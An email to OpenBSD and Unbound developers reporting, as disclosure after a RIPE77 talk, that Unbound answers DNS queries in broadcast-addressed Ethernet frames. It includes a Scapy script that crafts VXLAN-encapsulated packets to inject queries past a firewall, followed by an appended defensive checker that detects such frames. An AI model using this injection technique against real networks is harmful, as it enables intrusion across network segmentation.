Hi OpenBSD - Peter Hessler phessler and NLnetlabs - Unbound people

I did a small VXLAN related presentation today at RIPE77: VXLAN Security or Injection
https://ripe77.ripe.net/wp-content/uploads/presentations/32-vxlan-ripe77.pdf

which is also on Github
https://github.com/kramse/security-courses/tree/master/presentations/network/vxlan-ripe77

and includes this quote:

"Fun fact, Unbound on OpenBSD reply to DNS requests received in Ethernet packets with broadcast destination and IP destination being the IP of the server"

and Peter asked me to send email with details, and I am available for any questions you might have.

I had a small experimental network using OpenBSD as VXLAN routers, and small Beagle Bone Black devices running OpenBSD.

What I discovered was that sending a DNS query in Ethernet frames with ff:ff:ff:ff:ff:ff broadcast as MAC destination and IP destination of the server - an IP it has - DID get a response.

The behaviour was surprising, but may be right - and interesting for me, as I want to create some scanning method, and the less I need to know about the network, the better :-)

My script using Scapy was something like the below, but you can probably just use, if on same subnet:

...
packet=Ether(dst=broadcastmac,src=randommac)/IP(src=attacker, dst=destination)/UDP(sport=testport,dport=insideport)/DNS(rd=1,id=0xdead,qd=DNSQR(qname="www.wikipedia.org"))
sendp(packet,loop=0)

without the VXLAN header. If you prefer I can also generate PCAPs instead.

hlk@cornerstone03:~$ cat direct-dns-udp-example.py
#!/usr/bin/env python3
#
# Sources
# http://etherealmind.com/%e2%97%8e-comparing-arista-and-brocade-vxlan-vtep-hardware-termination/

###[ Loading modules ]###
import os
import sys
import time
from scapy.all import *

# First layer
# Note this is the first router for the attacker host!
# Not really needed, I found out later
routermac="ac:4b:c8:84:77:c3"
vtepsrc="10.10.9.77"
vtepdst="10.10.6.78"
# Check working from cornerstone03 - with the above MAC for local router!
#vtepdst="91.102.91.18"
vxlanport=4789

# Inside packet
# security-lab01
#dstmac="00:50:56:ba:63:2d"
#vni=21
# Nettest 10.96.0.10
dstmac="00:50:56:ba:50:e8"
vni=37

# Make VXLAN packet (outer Ethernet/IP/UDP plus the VXLAN header with the "I" flag set)
vxlan=Ether(dst=routermac)/IP(src=vtepsrc,dst=vtepdst)/UDP(sport=vxlanport,dport=vxlanport)/VXLAN(vni=vni,flags="Instance")

# firewall
fwmac="10:00:00:0c:01:00"

# Try sending out through firewall
#dstmac="ff:ff:ff:ff:ff:ff"
broadcastmac="ff:ff:ff:ff:ff:ff"
nettestmac="00:50:56:ba:50:e8"
dnspanopto="50:6b:8d:70:e9:24"
randommac="00:51:52:b3:54:e5"

attacker="185.27.115.6"
destination="10.96.0.18"

# sport is the one we want to contact inside the firewall, using as source opens firewall
insideport=53
# dport is a high port, just make this look like a normal request
testport=54040

# Inner frame: broadcast destination MAC, unicast IP destination, DNS query inside
packet=vxlan/Ether(dst=broadcastmac,src=randommac)/IP(src=attacker, dst=destination)/UDP(sport=testport,dport=insideport)/DNS(rd=1,id=0xdead,qd=DNSQR(qname="www.wikipedia.org"))

print("Sending this packet")
packet.show()
print("and then waiting for something, not from same IP! From inside NAT so another source IP")

pid = os.fork()
if pid:
    # we are the parent
    print("parent: setting up sniffing")
    # Wait for UDP packet
    data = sniff(filter="udp and port 54040 and net 109.105.96.0/19", count=1)
else:
    # we are the child
    time.sleep(10)
    print("child: sending packet")
    sendp(packet,loop=0)
    print("child: closing")
    sys.exit(0)

print("After fork and things")
#print(data.summary())
data[0].show()

# Dissecting the packet
ip=data[0].getlayer(IP)
udp=data[0].getlayer(UDP)
# decode_payload_as() re-dissects the UDP payload in place and returns None,
# so decode first and print the layer afterwards
udp.decode_payload_as(DNS)
print(udp)

-- 
Mvh/Best regards
Henrik

—
Henrik Lund Kramshøj, Follower of the Great Way of Unix
internet samurai cand.scient CISSP
[email protected] [email protected]
+45 2026 6000
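A defender-side check suggested by the observation above (an added example, not Henrik's script): it parses a VXLAN-in-UDP frame from raw bytes with no scapy dependency and flags an inner frame whose Ethernet destination is the broadcast MAC while the inner IPv4 destination is a unicast host, which is the combination Unbound answered here. The sample frame, the outer MACs and the function names are constructed for this example.

```python
import struct

VXLAN_PORT = 4789
BROADCAST = b"\xff" * 6

def _ipv4(pkt, off):
    """Return (proto, src, dst, header_end) for the IPv4 header starting at pkt[off]."""
    ihl = (pkt[off] & 0x0F) * 4
    return pkt[off + 9], pkt[off + 12:off + 16], pkt[off + 16:off + 20], off + ihl

def check_vxlan_frame(frame):
    """Flag a VXLAN-encapsulated frame whose inner Ethernet destination is the
    broadcast MAC while the inner IPv4 destination is a unicast host.
    Returns a dict (vni, inner addresses, UDP dport) or None if not flagged."""
    if len(frame) < 88 or frame[12:14] != b"\x08\x00":
        return None
    proto, _, _, l4 = _ipv4(frame, 14)
    if proto != 17 or struct.unpack("!H", frame[l4 + 2:l4 + 4])[0] != VXLAN_PORT:
        return None
    vx = l4 + 8                      # VXLAN header follows the outer UDP header
    if not frame[vx] & 0x08:         # "I" flag clear: VNI is not valid
        return None
    vni = int.from_bytes(frame[vx + 4:vx + 7], "big")
    inner = vx + 8                   # inner Ethernet frame starts here
    if frame[inner:inner + 6] != BROADCAST or frame[inner + 12:inner + 14] != b"\x08\x00":
        return None
    proto, src, dst, il4 = _ipv4(frame, inner + 14)
    if dst[0] >= 224:                # multicast / limited broadcast is legitimately broadcast
        return None
    dport = struct.unpack("!H", frame[il4 + 2:il4 + 4])[0] if proto == 17 else None
    return {"vni": vni, "inner_src": ".".join(map(str, src)),
            "inner_dst": ".".join(map(str, dst)), "udp_dport": dport}

def _ip_hdr(src, dst, plen):
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + plen, 0, 0, 64, 17, 0, bytes(src), bytes(dst))

def build_sample(inner_dst_mac):
    """Constructed sample, not a capture: the inner DNS query from the script
    above (185.27.115.6 -> 10.96.0.18:53, VNI 37); outer MACs are made up."""
    dns = bytes.fromhex("dead01000001000000000000") + b"\x03www\x09wikipedia\x03org\x00\x00\x01\x00\x01"
    inner = (inner_dst_mac + bytes.fromhex("005152b354e5") + b"\x08\x00"
             + _ip_hdr([185, 27, 115, 6], [10, 96, 0, 18], 8 + len(dns))
             + struct.pack("!HHHH", 54040, 53, 8 + len(dns), 0) + dns)
    vxlan = b"\x08\x00\x00\x00" + (37).to_bytes(3, "big") + b"\x00"
    return (bytes.fromhex("ac4bc88477c3") + bytes.fromhex("0050560000aa") + b"\x08\x00"
            + _ip_hdr([10, 10, 9, 77], [10, 10, 6, 78], 8 + len(vxlan) + len(inner))
            + struct.pack("!HHHH", 4789, 4789, 8 + len(vxlan) + len(inner), 0) + vxlan + inner)
```

Feeding frames from a VTEP-side capture through check_vxlan_frame() gives a list of VNIs and inner hosts that were reached via a broadcast MAC, which can be compared against what the overlay is expected to carry.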
